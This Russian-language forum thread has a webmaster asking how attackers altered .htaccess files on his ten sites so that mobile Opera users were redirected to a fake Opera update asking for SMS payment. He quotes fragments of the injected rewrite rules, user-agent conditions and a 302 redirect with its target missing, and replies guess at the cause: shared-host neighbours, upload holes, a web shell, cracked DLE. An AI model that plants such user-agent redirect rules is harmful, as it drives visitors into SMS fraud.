Хакнули сайт, помогите понять каким образом

12 3
Akula_
На сайте с 13.04.2010
Offline
62
3014

В общем сегодня утром еще все было хорошо, и вот вечером жалуется юзер, что зайдя с мобилы оперой ему предложили обновить оперу, заплатить смс и тд...

стал я смотреть что не так, открываю .htaccess и там такое...

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC]
...
много такого текста и в конце
RewriteRule ^(.*)$ [L,R=302]

давай смотреть на других сайтах и везде так, написал хостеру, они проверили по логам, по фтп и сшш кроме меня никто не ползал, отсюда вопрос как узнать где дырень, я сначала думал что меня протроянили и угнали пасс от фтп, но..нет

Движок самопис, писал сам и нигде код не светился

Подскажите каким образом могли хакнуть?

danmaster
На сайте с 04.02.2007
Offline
290
#1
Akula_:

Подскажите каким образом могли хакнуть?

Через "соседей" по шареду могли

Akula_
На сайте с 13.04.2010
Offline
62
#2

а как в этом удостовериться,

сейчас посмотрел есть пара сайтов с известными движками

как точно узнать откуда идет угроза

SI
На сайте с 03.12.2007
Offline
130
#3

Права на файл не 666 были?

-= Онлайн сервисы =-
Akula_
На сайте с 13.04.2010
Offline
62
#4

644

а могло это с тизерок прийти? вчера повесил стремнные тизеры.

Хотя нет. не могли же тизеры по всем сайтам и директориям пройтись

LEOnidUKG
На сайте с 25.11.2006
Offline
1762
#5

Что у вас за движок то стоит?

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Akula_
На сайте с 13.04.2010
Offline
62
#6

Да сам писал, думаю единственное что там не мое, это fckeditor, и у юзеров есть возможность заливать через него картинки, проверил кроме картинок ничего в директориях нет.

не знаю в какие логи посмотреть, чтобы узнать откуда(через какой именно сайт) меняли htaccess, на сервере моих сайтов 10, и во всех поменяли htacess, через какой заползи не знаю и это надо узнать.

на сервере есть и другие "мои" юзеры, и там все хорошо и без изменений, там другой пароль на фтп...блин теперь буду делать для каждого сайта свой фтп

W
На сайте с 05.04.2006
Offline
174
Wss
#7

думаю всем стоит на свои сайты с мобилы периодически заходить, у меня пару дней назад такой же случай был, тоже предложили скачать оперу, тоже левое было в .htaccess (сайт на дле)

Akula_, скиньте в личку вашего хостера, может он у нас один :)

бдю
Хортица
На сайте с 22.12.2006
Offline
289
#8

Akula_, у Вас ДЛЕ. У Вас shell. Все просто ;)

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
donc
На сайте с 16.01.2007
Offline
677
#9

5000 тема о "взломе" крякнутого ДЛЕ. И она будет вечной.

Хотя вроде "сам писал" :)

Продвижение сайтов от 25 000 в мес, прозрачно, надежно https://searchengines.guru/ru/forum/818412 , но не быстро, отзывы
A
На сайте с 20.08.2010
Offline
775
#10
donc:
И она будет вечной.

Пожалуй, вы правы. Сам с одного сайта ежедневно вычищаю ссылки из кода (почти каждый день ставят). Надо бы залатать дырку

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий